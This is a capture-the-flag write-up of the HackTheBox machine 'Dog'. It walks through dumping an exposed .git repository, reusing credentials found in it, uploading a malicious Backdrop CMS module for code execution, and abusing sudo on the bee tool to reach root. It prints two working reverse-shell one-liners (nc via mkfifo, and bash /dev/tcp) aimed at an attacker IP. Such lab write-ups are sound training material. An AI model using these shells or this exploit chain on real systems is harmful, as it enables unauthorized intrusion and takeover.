HackTheBox: Dog
Overview
Dog is a Linux machine hosting a Backdrop CMS application. Initial access involves discovering an exposed .git directory, dumping its contents to find hardcoded credentials, and exploiting a CMS vulnerability to establish a reverse shell. Privilege escalation is accomplished by abusing sudo privileges on a PHP administration tool.
Initial Enumeration
The Nmap scan reveals SSH (22) and an Apache web server (80) running Backdrop CMS. Nmap's http-git script identifies an exposed .git directory at the root of the server.
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
We map dog.htb to our /etc/hosts file and proceed to extract the repository.
Dumping the Git Repository
Using git-dumper, we extract the source code from the exposed .git directory:
pipx install git-dumper
git-dumper http://dog.htb/.git website
Inspecting the extracted codebase, we locate a configuration file (settings.php) containing hardcoded credentials for a user named tiffany:
Password: [REDACTED]
Initial Access: Backdrop CMS RCE
Logging into the Backdrop CMS administrative panel as tiffany, we can exploit an authenticated Remote Code Execution vulnerability. Backdrop CMS allows installing modules, which can be abused to upload malicious PHP code.
We pack a PHP reverse shell into a .tar archive:
tar czf shell.tar shell
After uploading it via /admin/modules/install, we trigger the shell by navigating to /modules/shell/shell.php?cmd=.... To establish an interactive connection, we execute a reverse shell payload:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.242 4444 > /tmp/f
Lateral Movement
Checking the /home directory, we discover another user, johncusack. Performing a quick password spray or reusing the discovered password grants us SSH access as johncusack, allowing us to retrieve the user flag.
johncusack@dog:~$ cat user.txt
[REDACTED]
Privilege Escalation: Sudo Abuse
Investigating sudo privileges for johncusack, we find that while standard sudo su fails, the user is permitted to execute a specific administrative binary, /usr/local/bin/bee, without a password.
sudo /usr/local/bin/bee --help
bee is a command-line tool for Backdrop CMS that supports executing arbitrary PHP code using the eval argument. We leverage this functionality to spawn a reverse shell running as root.
sudo /usr/local/bin/bee --root=/var/www/html eval "echo shell_exec('bash -c \"bash -i >& /dev/tcp/10.10.14.242/4444 0>&1\"');"
The listener catches the connection, granting root access and the final flag.
root@dog:~# cat root.txt
[REDACTED]